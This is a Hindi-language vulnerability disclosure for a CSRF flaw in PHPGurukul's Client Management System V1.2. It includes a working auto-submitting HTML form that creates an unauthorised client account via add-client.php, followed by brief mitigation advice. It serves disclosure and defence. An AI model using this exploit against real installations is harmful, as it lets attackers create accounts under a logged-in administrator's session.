
एक PHP-आधारित क्लाइंट प्रबंधन प्रणाली में CSRF कमजोरी को प्रदर्शित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें HTML एक्सप्लॉइट कोड और वेब एप्लिकेशन सुरक्षा परीक्षण के लिए शमन रणनीतियाँ शामिल हैं।
परियोजना का नाम और रेपो URL : https://phpgurukul.com/client-management-system-using-php-mysql/
भेद्यता का नाम : क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
प्रभावित संस्करण : V1.2
क्लाइंट मैनेजमेंट सिस्टम (PHPGurukul द्वारा विकसित) के ग्राहक जोड़ने की कार्यक्षमता में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता मौजूद है। CSRF एक हमला है जिसमें एक प्रमाणित उपयोगकर्ता को वेब एप्लिकेशन पर एक दुर्भावनापूर्ण अनुरोध सबमिट करने के लिए बरगलाया जाता है। इससे उपयोगकर्ता की ओर से अनधिकृत कार्य किए जा सकते हैं। इस रिपोर्ट में, हम प्रदर्शित करते हैं कि CSRF का उपयोग क्लाइंट मैनेजमेंट सिस्टम में नकली उपयोगकर्ता बनाने के लिए कैसे किया जा सकता है और शमन रणनीतियाँ सुझाते हैं।
दिए गए क्रेडेंशियल का उपयोग करके, क्लाइंट मैनेजमेंट सिस्टम में लॉगिन करें।



CSRF हमले के लिए HTML PoC नीचे दिया गया है:
<html>
<body>
<form action="http://localhost/clientms/admin/add-client.php" method="POST">
<input type="hidden" name="accounttype" value="Active Account" />
<input type="hidden" name="cname" value="moulimurugan" />
<input type="hidden" name="comname" value="kppr" />
<input type="hidden" name="address" value="vijayamangalam" />
<input type="hidden" name="city" value="erode" />
<input type="hidden" name="state" value="tamil" />
<input type="hidden" name="zcode" value="638026" />
<input type="hidden" name="wphnumber" value="968560710" />
<input type="hidden" name="cellphnumber" value="6931052465" />
<input type="hidden" name="ophnumber" value="9638560410" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="moulimurugan" />
<input type="hidden" name="websiteadd" value="clientmsdb" />
<input type="hidden" name="notes" value="Nil" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>



CSRF हमलों को रोकने के लिए, निम्नलिखित उपायों को लागू करें:
SameSite=Strict या SameSite=Lax विशेषताओं के साथ सेट करें।POST का उपयोग करें और साइड इफेक्ट वाले GET अनुरोधों को संसाधित करने से बचें।यह रिपोर्ट प्रदर्शित करती है कि CSRF भेद्यताओं का शोषण करके क्लाइंट मैनेजमेंट सिस्टम में अनधिकृत ग्राहक कैसे बनाए जा सकते हैं। सुझाई गई शमन रणनीतियों को लागू करने से एप्लिकेशन को ऐसे हमलों से सुरक्षित रखने में मदद मिलेगी।